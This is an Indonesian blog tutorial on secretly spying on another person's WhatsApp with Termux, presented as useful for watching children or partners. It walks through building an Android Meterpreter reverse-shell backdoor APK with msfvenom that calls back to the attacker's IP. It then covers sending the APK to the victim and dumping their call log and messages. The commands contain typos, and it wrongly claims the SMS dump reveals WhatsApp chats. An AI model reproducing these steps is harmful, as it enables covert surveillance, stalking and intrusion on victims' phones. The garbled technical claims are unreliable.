Artikel Terbaru

Aplikasi Sadap WA Tanpa Menyentuh HP Korban Termux 2022

Aplikasi Sadap WA Tanpa Menyentuh HP Korban Termux
Aplikasi Sadap WA Tanpa Menyentuh HP Korban Termux - Jika anda melakukan penyadapan WhatsApp itu salah satu langkah memantau kegiatan, apa saja yang dilakukan oleh para penggunanya.

Terlebih lagi melakukan penyadapan akun WhatsApp lebih baik anda lakukan untuk hal-hal yang bermanfaat seperti memantau anak, pasangan atau anggota keluarganya yang lain.

Kenapa melakukan hal ini, supaya dapat mengetahui dengan jelas sama siapa saja mereka melakukan komunikasi sehingga anda dapat memantaunya.

Apa lagi ada banyak cara yang dapat anda gunakan didalam melakukan penghackkan, sama seperti memakai aplikasi pihak ketiga bahkan anda bisa melakukannya sendiri.

Salah satu aplikasi yang akan anda gunakan yakni aplikasi Termux, oleh sebab itu anda dapat melakukan penginstallan langsung di Android.


Pembahasan Aplikasi Sadap WA Tanpa Menyentuh HP Korban Termux

Pasalnya Termux sendiri salah satu aplikasi yang sangat terkenal, bahkan sering dipergunakan oleh para hacker didalam melancarkan aksinya.

Bahkan Termux dijadikan sebagai salah satu bahan dan alat dasar, didalam melakukan kegiatan hack dan itupun untuk berbagai macam aplikasi media soial termasuk aplikasi chatting yakni WhatsApp.

Meskipun cara penggunaannya pun bisa dibilang sangat sulit, namun aplikasi tersebut makin lama semakin disukai dikarenakan hack tetap dapat dilakukan tanpa mneyentuh HP milik korban.


Apa bila anda masih pemula didalam dunia hacker, lebih baik anda pelajari lebih dulu mengenai aplikasi Termux supaya kegiatan hack berhasil dilakukan.

Jika anda tertarik didalam menggunakannya, silahkan anda simak mengenai aplikasi sadap WA tanpa menyentuh HP korban Termux sebagai berikut.


Aplikasi Sadap WA Tanpa Menyentuh HP Korban Termux


Aplikasi Sadap WA Tanpa Menyentuh HP Korban Termux

Aplikasi Sadap WA Tanpa Menyentuh HP Korban Termux
Aplikasi Sadap WA Tanpa Menyentuh HP Korban Termux
Berikut aplikasi sadap WA tanpa menyentuh HP korban Termux terbaru:
  • Pertama-tama anda harus memastikan perangkat Android yang anda pergunakan mempunyai Operasi Sistem (OS) minimalnya 5.0 ke atas, 32 atau 62 bit keatas.
  • Setelah itu, anda unduh dan install aplikasi Termux atau silahkan anda kunjungi melalui link berikut ini Aplikasi Termux.
  • Lalu anda buka aplikasi tersebut apa bila anda sudah berhasil menginstallnya.
  • Kemudian anda lihat alamat IP anda sendiri dengan cara ketik inconfig pada aplikasi Termux.
  • Silahkan anda ketik juga script sebagai berikut:
msfvenom -p android/meterpreter/reserve_tcp
LHOST=192.168.43.166 LPORT=4444 R >hack.apk
  • Selanjutnya anda LHOST di kalimat barusan dan ubah dengan menggunakan IP anda sendiri yang sudah dilihat pada langkah awal sebelumnya.
  • Jika ingin melihat file backdoor yang telah jadi, tinggal buka menu File > Home > hack.apk.
  • Setelah itu tinggal kirim file backdoor ini ke target atau calon korban bisa juga lewat WA, Messenger dan lain sebagainya.
  • Bahkan anda dapat melihat atau menyadap akun WhatsApp target, apa bila target sudah berhasil melakukan penginstall apk yang anda kirimkan barusan.
  • Sementara untuk melihat hasil dari sadapan, anda tinggal melanjutkan ke langkah selanjutnya sebagai berikut:
  • Tinggal ketik script selanjutnya untuk bisa melihat riwayat panggilan target
dump_callog
  • Sedangkan untuk dapat melihat riwayat chat pesan di akun WA target, langsung saja ketik script di bawah yakni:
dump-sms.


Akhir Kata

Demikianlah penjelasan yang telah kami sampaikan untuk anda, pasalnya dari informasi anda akan mengetahui cara hacker melakukan penyadapan di WhatsApp.

Jika anda menggunakannya, silahkan anda ikuti setiap langkah-langkah yang kami sampaikan dengan benar-benar supaya anda berhasil melakukan penyadapan.

Akan tetapi ini sekedar informasi lho ya, jangan sampai anda menggunakan ke hal-hal yang dapat merugikan orang lain kedepannya.

Itulah seluruh isi artikel kita kali ini mengenai aplikasi sadap WA tanpa menyentuh HP korban Termux. Sekian dan semoga bermanfaat.
Dody S. Praktisi teknologi, editor dan jurnalis di 1001Media.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel